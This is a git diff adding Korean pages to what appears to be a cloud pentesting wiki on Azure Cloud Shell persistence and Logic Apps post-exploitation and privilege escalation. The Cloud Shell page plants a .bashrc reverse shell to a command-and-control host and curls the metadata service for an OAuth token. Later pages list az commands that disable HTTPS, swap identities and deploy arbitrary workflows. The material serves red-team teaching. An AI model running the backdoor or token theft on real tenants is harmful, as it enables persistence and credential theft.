diff --git a/src/SUMMARY.md b/src/SUMMARY.md index d05776c71..4d0520541 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -409,6 +409,7 @@ - [Az - ARM Templates / Deployments](pentesting-cloud/azure-security/az-services/az-arm-templates.md) - [Az - Automation Accounts](pentesting-cloud/azure-security/az-services/az-automation-accounts.md) - [Az - Azure App Services](pentesting-cloud/azure-security/az-services/az-app-services.md) + - [Az - Cloud Shell](pentesting-cloud/azure-security/az-services/az-cloud-shell.md) - [Az - Container Registry](pentesting-cloud/azure-security/az-services/az-container-registry.md) - [Az - Container Registry](pentesting-cloud/azure-security/az-services/az-container-instances.md) - [Az - CosmosDB](pentesting-cloud/azure-security/az-services/az-cosmosDB.md) @@ -452,6 +453,7 @@ - [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md) - [Az - Function Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md) - [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md) + - [Az - Logic Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.md) - [Az - MySQL](pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.md) - [Az - PostgreSQL](pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.md) - [Az - Queue Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md) @@ -471,6 +473,7 @@ - [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md) - [Az - Functions App Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md) - [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md) + - [Az - Logic Apps Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md) - [Az - MySQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.md) - [Az - PostgreSQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.md) - [Az - Queue Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md) @@ -480,6 +483,7 @@ - [Az - SQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md) - [Az - Virtual Machines & Network Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md) - [Az - Persistence](pentesting-cloud/azure-security/az-persistence/README.md) + - [Az - Cloud Shell Persistence](pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md) - [Az - Queue Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md) - [Az - VMs Persistence](pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md) - [Az - Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md) diff --git a/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md b/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md new file mode 100644 index 000000000..b5c519428 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md @@ -0,0 +1,56 @@ +# Az - Cloud Shell Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** ๐Ÿ’ฌ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** ๐Ÿฆ [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Cloud Shell Persistence + +Azure Cloud Shell์€ ์ง€์†์ ์ธ ์ €์žฅ์†Œ์™€ ์ž๋™ ์ธ์ฆ์„ ํ†ตํ•ด Azure ๋ฆฌ์†Œ์Šค๋ฅผ ๊ด€๋ฆฌํ•  ์ˆ˜ ์žˆ๋Š” ๋ช…๋ น์ค„ ์•ก์„ธ์Šค๋ฅผ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. ๊ณต๊ฒฉ์ž๋Š” ์ง€์†์ ์ธ ํ™ˆ ๋””๋ ‰ํ† ๋ฆฌ์— ๋ฐฑ๋„์–ด๋ฅผ ๋ฐฐ์น˜ํ•˜์—ฌ ์ด๋ฅผ ์•…์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: + +* **์ง€์†์ ์ธ ์ €์žฅ์†Œ**: Azure Cloud Shell์˜ ํ™ˆ ๋””๋ ‰ํ† ๋ฆฌ๋Š” Azure ํŒŒ์ผ ๊ณต์œ ์— ๋งˆ์šดํŠธ๋˜๋ฉฐ ์„ธ์…˜์ด ์ข…๋ฃŒ๋œ ํ›„์—๋„ ๊ทธ๋Œ€๋กœ ์œ ์ง€๋ฉ๋‹ˆ๋‹ค. +* **์‹œ์ž‘ ์Šคํฌ๋ฆฝํŠธ**: .bashrc์™€ ๊ฐ™์€ ํŒŒ์ผ์€ ๊ฐ ์„ธ์…˜ ์‹œ์ž‘ ์‹œ ์ž๋™์œผ๋กœ ์‹คํ–‰๋˜์–ด ํด๋ผ์šฐ๋“œ ์…ธ์ด ์‹œ์ž‘๋  ๋•Œ ์ง€์†์ ์ธ ์‹คํ–‰์„ ํ—ˆ์šฉํ•ฉ๋‹ˆ๋‹ค. + +Example backdoor in .bashrc: + +{% code overflow="wrap" %} +```bash +echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/$CCSERVER/443 0>&1 &)' >> $HOME/.bashrc +``` +{% endcode %} + +์ด ๋ฐฑ๋„์–ด๋Š” ์‚ฌ์šฉ์ž๊ฐ€ ํด๋ผ์šฐ๋“œ ์…ธ์„ ์ข…๋ฃŒํ•œ ํ›„์—๋„ 5๋ถ„ ๋™์•ˆ ๋ช…๋ น์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. + +๋˜ํ•œ Azure์˜ ๋ฉ”ํƒ€๋ฐ์ดํ„ฐ ์„œ๋น„์Šค์— ์ฟผ๋ฆฌํ•˜์—ฌ ์ธ์Šคํ„ด์Šค ์„ธ๋ถ€์ •๋ณด ๋ฐ ํ† ํฐ์„ ๊ฐ€์ ธ์˜ต๋‹ˆ๋‹ค: +{% code overflow="wrap" %} +```bash +curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -s +``` +{% endcode %} + + +{% hint style="success" %} +AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +HackTricks ์ง€์›ํ•˜๊ธฐ + +* [**๊ตฌ๋… ๊ณ„ํš**](https://github.com/sponsors/carlospolop) ํ™•์ธํ•˜๊ธฐ! +* **๐Ÿ’ฌ [**๋””์Šค์ฝ”๋“œ ๊ทธ๋ฃน**](https://discord.gg/hRep4RUj7f) ๋˜๋Š” [**ํ…”๋ ˆ๊ทธ๋žจ ๊ทธ๋ฃน**](https://t.me/peass)์— ์ฐธ์—ฌํ•˜๊ฑฐ๋‚˜ **ํŠธ์œ„ํ„ฐ** ๐Ÿฆ [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**๋ฅผ ํŒ”๋กœ์šฐํ•˜์„ธ์š”.** +* **[**HackTricks**](https://github.com/carlospolop/hacktricks) ๋ฐ [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) ๊นƒํ—ˆ๋ธŒ ๋ฆฌํฌ์ง€ํ† ๋ฆฌ์— PR์„ ์ œ์ถœํ•˜์—ฌ ํ•ดํ‚น ํŠธ๋ฆญ์„ ๊ณต์œ ํ•˜์„ธ์š”.** + +
+{% endhint %} diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.md new file mode 100644 index 000000000..92be9f6f0 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.md @@ -0,0 +1,181 @@ +# Az - Logic Apps Post Exploitation + +{% hint style="success" %} +AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +HackTricks ์ง€์›ํ•˜๊ธฐ + +* [**๊ตฌ๋… ๊ณ„ํš**](https://github.com/sponsors/carlospolop) ํ™•์ธํ•˜๊ธฐ! +* **๐Ÿ’ฌ [**Discord ๊ทธ๋ฃน**](https://discord.gg/hRep4RUj7f) ๋˜๋Š” [**ํ…”๋ ˆ๊ทธ๋žจ ๊ทธ๋ฃน**](https://t.me/peass)์— ์ฐธ์—ฌํ•˜๊ฑฐ๋‚˜ **Twitter** ๐Ÿฆ [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**๋ฅผ ํŒ”๋กœ์šฐํ•˜์„ธ์š”.** +* **[**HackTricks**](https://github.com/carlospolop/hacktricks) ๋ฐ [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) ๊นƒํ—ˆ๋ธŒ ๋ฆฌํฌ์ง€ํ† ๋ฆฌ์— PR์„ ์ œ์ถœํ•˜์—ฌ ํ•ดํ‚น ํŒ์„ ๊ณต์œ ํ•˜์„ธ์š”.** + +
+{% endhint %} + +## Logic Apps ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ํฌ์ŠคํŠธ ์ต์Šคํ”Œ๋กœ์ดํ…Œ์ด์…˜ +Logic Apps์— ๋Œ€ํ•œ ์ž์„ธํ•œ ์ •๋ณด๋Š” ๋‹ค์Œ์„ ํ™•์ธํ•˜์„ธ์š”: + +{% content-ref url="../az-services/az-logic-apps.md" %} +[az-logic-apps.md](../az-services/az-logic-apps.md) +{% endcontent-ref %} + +### "Microsoft.Logic/workflows/read", "Microsoft.Logic/workflows/write" && "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action" +์ด ๊ถŒํ•œ์„ ์‚ฌ์šฉํ•˜๋ฉด Logic App ์›Œํฌํ”Œ๋กœ๋ฅผ ์ˆ˜์ •ํ•˜๊ณ  ํ•ด๋‹น ID๋ฅผ ๊ด€๋ฆฌํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๊ตฌ์ฒด์ ์œผ๋กœ, ์‹œ์Šคํ…œ ํ• ๋‹น ๋ฐ ์‚ฌ์šฉ์ž ํ• ๋‹น ๊ด€๋ฆฌ ID๋ฅผ ์›Œํฌํ”Œ๋กœ์— ํ• ๋‹นํ•˜๊ฑฐ๋‚˜ ์ œ๊ฑฐํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์ด๋ฅผ ํ†ตํ•ด Logic App์ด ๋ช…์‹œ์ ์ธ ์ž๊ฒฉ ์ฆ๋ช… ์—†์ด ๋‹ค๋ฅธ Azure ๋ฆฌ์†Œ์Šค์— ์ธ์ฆํ•˜๊ณ  ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. + +{% code overflow="wrap" %} +```bash +az logic workflow identity remove/assign \ +--name \ +--resource-group \ +--system-assigned true \ +--user-assigned "/subscriptions//resourceGroups//providers/Microsoft.ManagedIdentity/userAssignedIdentities/" +``` +{% endcode %} + +### "Microsoft.Web/sites/read", "Microsoft.Web/sites/write" +์ด ๊ถŒํ•œ์„ ์‚ฌ์šฉํ•˜๋ฉด App Service Plan์— ํ˜ธ์ŠคํŒ…๋œ Logic Apps๋ฅผ ์ƒ์„ฑํ•˜๊ฑฐ๋‚˜ ์—…๋ฐ์ดํŠธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์—ฌ๊ธฐ์—๋Š” HTTPS ๊ฐ•์ œ ์ ์šฉ์„ ํ™œ์„ฑํ™”ํ•˜๊ฑฐ๋‚˜ ๋น„ํ™œ์„ฑํ™”ํ•˜๋Š” ๊ฒƒ๊ณผ ๊ฐ™์€ ์„ค์ •์„ ์ˆ˜์ •ํ•˜๋Š” ๊ฒƒ์ด ํฌํ•จ๋ฉ๋‹ˆ๋‹ค. + +{% code overflow="wrap" %} +```bash +az logicapp update \ +--resource-group \ +--name \ +--set httpsOnly=false +``` +{% endcode %} + +### "Microsoft.Web/sites/stop/action", "Microsoft.Web/sites/start/action" || "Microsoft.Web/sites/restart/action" +์ด ๊ถŒํ•œ์„ ์‚ฌ์šฉํ•˜๋ฉด App Service Plan์— ํ˜ธ์ŠคํŒ…๋œ Logic Apps๋ฅผ ํฌํ•จํ•˜์—ฌ ์›น ์•ฑ์„ ์‹œ์ž‘/์ค‘์ง€/์žฌ์‹œ์ž‘ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด ์ž‘์—…์€ ์ด์ „์— ์ค‘์ง€๋œ ์•ฑ์ด ์˜จ๋ผ์ธ์œผ๋กœ ์ „ํ™˜๋˜๊ณ  ๊ธฐ๋Šฅ์„ ์žฌ๊ฐœํ•˜๋„๋ก ๋ณด์žฅํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” ์›Œํฌํ”Œ๋กœ๋ฅผ ๋ฐฉํ•ดํ•˜๊ฑฐ๋‚˜ ์˜๋„ํ•˜์ง€ ์•Š์€ ์ž‘์—…์„ ์œ ๋ฐœํ•˜๊ฑฐ๋‚˜ Logic Apps๋ฅผ ์˜ˆ๊ธฐ์น˜ ์•Š๊ฒŒ ์‹œ์ž‘, ์ค‘์ง€ ๋˜๋Š” ์žฌ์‹œ์ž‘ํ•˜์—ฌ ๋‹ค์šดํƒ€์ž„์„ ์ดˆ๋ž˜ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. + +{% code overflow="wrap" %} +```bash +az webapp start/stop/restart \ +--name \ +--resource-group +``` +{% endcode %} + + +### "Microsoft.Web/sites/config/list/action", "Microsoft.Web/sites/read" && "Microsoft.Web/sites/config/write" + +์ด ๊ถŒํ•œ์„ ์‚ฌ์šฉํ•˜๋ฉด App Service Plan์— ํ˜ธ์ŠคํŒ…๋œ Logic Apps๋ฅผ ํฌํ•จํ•œ ์›น ์•ฑ์˜ ์„ค์ •์„ ๊ตฌ์„ฑํ•˜๊ฑฐ๋‚˜ ์ˆ˜์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋ฅผ ํ†ตํ•ด ์•ฑ ์„ค์ •, ์—ฐ๊ฒฐ ๋ฌธ์ž์—ด, ์ธ์ฆ ๊ตฌ์„ฑ ๋“ฑ์„ ๋ณ€๊ฒฝํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. + +{% code overflow="wrap" %} +```bash +az logicapp config appsettings set \ +--name \ +--resource-group \ +--settings "=" +``` +{% endcode %} + +### "Microsoft.Logic/integrationAccounts/write" +์ด ๊ถŒํ•œ์„ ์‚ฌ์šฉํ•˜๋ฉด Azure Logic Apps ํ†ตํ•ฉ ๊ณ„์ •์„ ์ƒ์„ฑ, ์—…๋ฐ์ดํŠธ ๋˜๋Š” ์‚ญ์ œํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์—ฌ๊ธฐ์—๋Š” ๋งต, ์Šคํ‚ค๋งˆ, ํŒŒํŠธ๋„ˆ, ๊ณ„์•ฝ ๋“ฑ๊ณผ ๊ฐ™์€ ํ†ตํ•ฉ ๊ณ„์ • ์ˆ˜์ค€์˜ ๊ตฌ์„ฑ์„ ๊ด€๋ฆฌํ•˜๋Š” ๊ฒƒ์ด ํฌํ•จ๋ฉ๋‹ˆ๋‹ค. + +{% code overflow="wrap" %} +```bash +az logic integration-account create \ +--resource-group \ +--name \ +--location \ +--sku \ +--state Enabled +``` +{% endcode %} + +### "Microsoft.Resources/subscriptions/resourcegroups/read" && "Microsoft.Logic/integrationAccounts/batchConfigurations/write" + +์ด ๊ถŒํ•œ์„ ์‚ฌ์šฉํ•˜๋ฉด Azure Logic Apps ํ†ตํ•ฉ ๊ณ„์ • ๋‚ด์—์„œ ๋ฐฐ์น˜ ๊ตฌ์„ฑ์„ ์ƒ์„ฑํ•˜๊ฑฐ๋‚˜ ์ˆ˜์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋ฐฐ์น˜ ๊ตฌ์„ฑ์€ Logic Apps๊ฐ€ ๋ฐฐ์น˜ ์ฒ˜๋ฆฌ๋ฅผ ์œ„ํ•ด ์ˆ˜์‹  ๋ฉ”์‹œ์ง€๋ฅผ ์ฒ˜๋ฆฌํ•˜๊ณ  ๊ทธ๋ฃนํ™”ํ•˜๋Š” ๋ฐฉ๋ฒ•์„ ์ •์˜ํ•ฉ๋‹ˆ๋‹ค. + +{% code overflow="wrap" %} +```bash +az logic integration-account batch-configuration create \ +--resource-group \ +--integration-account-name \ +--name \ +--release-criteria '{ +"messageCount": 100, +"batchSize": 1048576, +}' +``` +{% endcode %} + +### "Microsoft.Resources/subscriptions/resourcegroups/read" && "Microsoft.Logic/integrationAccounts/maps/write" +์ด ๊ถŒํ•œ์„ ์‚ฌ์šฉํ•˜๋ฉด Azure Logic Apps ํ†ตํ•ฉ ๊ณ„์ • ๋‚ด์—์„œ ๋งต์„ ์ƒ์„ฑํ•˜๊ฑฐ๋‚˜ ์ˆ˜์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋งต์€ ๋ฐ์ดํ„ฐ๋ฅผ ํ•œ ํ˜•์‹์—์„œ ๋‹ค๋ฅธ ํ˜•์‹์œผ๋กœ ๋ณ€ํ™˜ํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋˜๋ฉฐ, ์„œ๋กœ ๋‹ค๋ฅธ ์‹œ์Šคํ…œ๊ณผ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜ ๊ฐ„์˜ ์›ํ™œํ•œ ํ†ตํ•ฉ์„ ๊ฐ€๋Šฅํ•˜๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. + +{% code overflow="wrap" %} +```bash +az logic integration-account map create \ +--resource-group \ +--integration-account-name \ +--name \ +--map-type \ +--content-type application/xml \ +--map-content map-content.xslt +``` +{% endcode %} + +### "Microsoft.Resources/subscriptions/resourcegroups/read" && "Microsoft.Logic/integrationAccounts/partners/write" +์ด ๊ถŒํ•œ์„ ์‚ฌ์šฉํ•˜๋ฉด Azure Logic Apps ํ†ตํ•ฉ ๊ณ„์ •์—์„œ ํŒŒํŠธ๋„ˆ๋ฅผ ์ƒ์„ฑํ•˜๊ฑฐ๋‚˜ ์ˆ˜์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ํŒŒํŠธ๋„ˆ๋Š” ๋น„์ฆˆ๋‹ˆ์Šค ๊ฐ„(B2B) ์›Œํฌํ”Œ๋กœ์— ์ฐธ์—ฌํ•˜๋Š” ์—”ํ„ฐํ‹ฐ ๋˜๋Š” ์‹œ์Šคํ…œ์„ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค. + +{% code overflow="wrap" %} +```bash +az logic integration-account partner create \ +--resource-group \ +--integration-account-name \ +--name \ +--partner-type \ +--content '{ +"b2b": { +"businessIdentities": [ +{ +"qualifier": "ZZ", +"value": "TradingPartner1" +} +] +} +}' +``` +{% endcode %} + +### "Microsoft.Resources/subscriptions/resourcegroups/read" && "Microsoft.Logic/integrationAccounts/sessions/write" +์ด ๊ถŒํ•œ์„ ์‚ฌ์šฉํ•˜๋ฉด Azure Logic Apps ํ†ตํ•ฉ ๊ณ„์ • ๋‚ด์—์„œ ์„ธ์…˜์„ ์ƒ์„ฑํ•˜๊ฑฐ๋‚˜ ์ˆ˜์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์„ธ์…˜์€ B2B ์›Œํฌํ”Œ๋กœ์šฐ์—์„œ ๋ฉ”์‹œ์ง€๋ฅผ ๊ทธ๋ฃนํ™”ํ•˜๊ณ  ์ •์˜๋œ ๊ธฐ๊ฐ„ ๋™์•ˆ ๊ด€๋ จ ๊ฑฐ๋ž˜๋ฅผ ์ถ”์ ํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. + +{% code overflow="wrap" %} +```bash +az logic integration-account session create \ +--resource-group \ +--integration-account-name \ +--name \ +--content '{ +"properties": { +"sessionId": "session123", +"data": { +"key1": "value1", +"key2": "value2" +} +} +}' +``` +{% endcode %} + +### "*/delete" +์ด ๊ถŒํ•œ์œผ๋กœ Azure Logic Apps์™€ ๊ด€๋ จ๋œ ๋ฆฌ์†Œ์Šค๋ฅผ ์‚ญ์ œํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. + +{% hint style="success" %} +AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +HackTricks ์ง€์›ํ•˜๊ธฐ + +* [**๊ตฌ๋… ๊ณ„ํš**](https://github.com/sponsors/carlospolop) ํ™•์ธํ•˜๊ธฐ! +* **๐Ÿ’ฌ [**Discord ๊ทธ๋ฃน**](https://discord.gg/hRep4RUj7f) ๋˜๋Š” [**ํ…”๋ ˆ๊ทธ๋žจ ๊ทธ๋ฃน**](https://t.me/peass)์— ์ฐธ์—ฌํ•˜๊ฑฐ๋‚˜ **Twitter** ๐Ÿฆ [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**๋ฅผ ํŒ”๋กœ์šฐํ•˜์„ธ์š”.** +* **[**HackTricks**](https://github.com/carlospolop/hacktricks) ๋ฐ [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) ๊นƒํ—ˆ๋ธŒ ๋ฆฌํฌ์ง€ํ† ๋ฆฌ์— PR์„ ์ œ์ถœํ•˜์—ฌ ํ•ดํ‚น ํŒ์„ ๊ณต์œ ํ•˜์„ธ์š”.** + +
+{% endhint %} diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md new file mode 100644 index 000000000..9aea2e04f --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md @@ -0,0 +1,77 @@ +# Az - Logic Apps Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** ๐Ÿ’ฌ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** ๐Ÿฆ [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Logic Apps Privesc +SQL ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค์— ๋Œ€ํ•œ ์ž์„ธํ•œ ๋‚ด์šฉ์€ ๋‹ค์Œ์„ ํ™•์ธํ•˜์„ธ์š”: + +{% content-ref url="../az-services/az-logic-apps.md" %} +[az-logic-apps.md](../az-services/az-logic-apps.md) +{% endcontent-ref %} + +### ("Microsoft.Resources/subscriptions/resourcegroups/read", "Microsoft.Logic/workflows/read", "Microsoft.Logic/workflows/write" && "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action") && ("Microsoft.Logic/workflows/triggers/run/action") + +์ด ๊ถŒํ•œ์„ ์‚ฌ์šฉํ•˜๋ฉด Azure Logic Apps ์›Œํฌํ”Œ๋กœ๋ฅผ ์ƒ์„ฑํ•˜๊ฑฐ๋‚˜ ์—…๋ฐ์ดํŠธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์›Œํฌํ”Œ๋กœ๋Š” ๋‹ค์–‘ํ•œ ์‹œ์Šคํ…œ ๋ฐ ์„œ๋น„์Šค ๊ฐ„์˜ ์ž๋™ํ™”๋œ ํ”„๋กœ์„ธ์Šค์™€ ํ†ตํ•ฉ์„ ์ •์˜ํ•ฉ๋‹ˆ๋‹ค. + +{% code overflow="wrap" %} +```bash +az logic workflow create \ +--resource-group \ +--name \ +--definition \ +--location + +az logic workflow update \ +--name my-new-workflow \ +--resource-group logicappgroup \ +--definition +``` +{% endcode %} + +๋ณ€๊ฒฝํ•œ ํ›„, ๋‹ค์Œ๊ณผ ๊ฐ™์ด ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: +```bash +az rest \ +--method post \ +--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{logicAppName}/triggers/{triggerName}/run?api-version=2016-10-01" \ +--body '{}' \ +--headers "Content-Type=application/json" +``` +### ("Microsoft.Web/sites/read", "Microsoft.Web/sites/basicPublishingCredentialsPolicies/read", "Microsoft.Web/sites/write", "Microsoft.Web/sites/config/list/action") && ("Microsoft.Web/sites/start/action") +์ด ๊ถŒํ•œ์„ ์‚ฌ์šฉํ•˜๋ฉด ZIP ํŒŒ์ผ ๋ฐฐํฌ๋ฅผ ํ†ตํ•ด Logic App ์›Œํฌํ”Œ๋กœ๋ฅผ ๋ฐฐํฌํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๊ถŒํ•œ์€ ์•ฑ ์„ธ๋ถ€์ •๋ณด ์ฝ๊ธฐ, ๊ฒŒ์‹œ ์ž๊ฒฉ ์ฆ๋ช… ์•ก์„ธ์Šค, ๋ณ€๊ฒฝ ์‚ฌํ•ญ ์ž‘์„ฑ ๋ฐ ์•ฑ ๊ตฌ์„ฑ ๋‚˜์—ด๊ณผ ๊ฐ™์€ ์ž‘์—…์„ ๊ฐ€๋Šฅํ•˜๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. ์‹œ์ž‘ ๊ถŒํ•œ๊ณผ ํ•จ๊ป˜ ์›ํ•˜๋Š” ์ฝ˜ํ…์ธ ๋กœ ์ƒˆ๋กœ์šด Logic App์„ ์—…๋ฐ์ดํŠธํ•˜๊ณ  ๋ฐฐํฌํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. + +{% code overflow="wrap" %} +```bash +az logicapp deployment source config-zip \ +--name \ +--resource-group \ +--src +``` +{% endcode %} + +{% hint style="success" %} +AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +HackTricks ์ง€์›ํ•˜๊ธฐ + +* [**๊ตฌ๋… ๊ณ„ํš**](https://github.com/sponsors/carlospolop) ํ™•์ธํ•˜๊ธฐ! +* **๐Ÿ’ฌ [**Discord ๊ทธ๋ฃน**](https://discord.gg/hRep4RUj7f) ๋˜๋Š” [**ํ…”๋ ˆ๊ทธ๋žจ ๊ทธ๋ฃน**](https://t.me/peass)์— ์ฐธ์—ฌํ•˜๊ฑฐ๋‚˜ **Twitter** ๐Ÿฆ [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**๋ฅผ ํŒ”๋กœ์šฐํ•˜์„ธ์š”.** +* **[**HackTricks**](https://github.com/carlospolop/hacktricks) ๋ฐ [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) ๊นƒํ—ˆ๋ธŒ ๋ฆฌํฌ์ง€ํ† ๋ฆฌ์— PR์„ ์ œ์ถœํ•˜์—ฌ ํ•ดํ‚น ํŠธ๋ฆญ์„ ๊ณต์œ ํ•˜์„ธ์š”.** + +
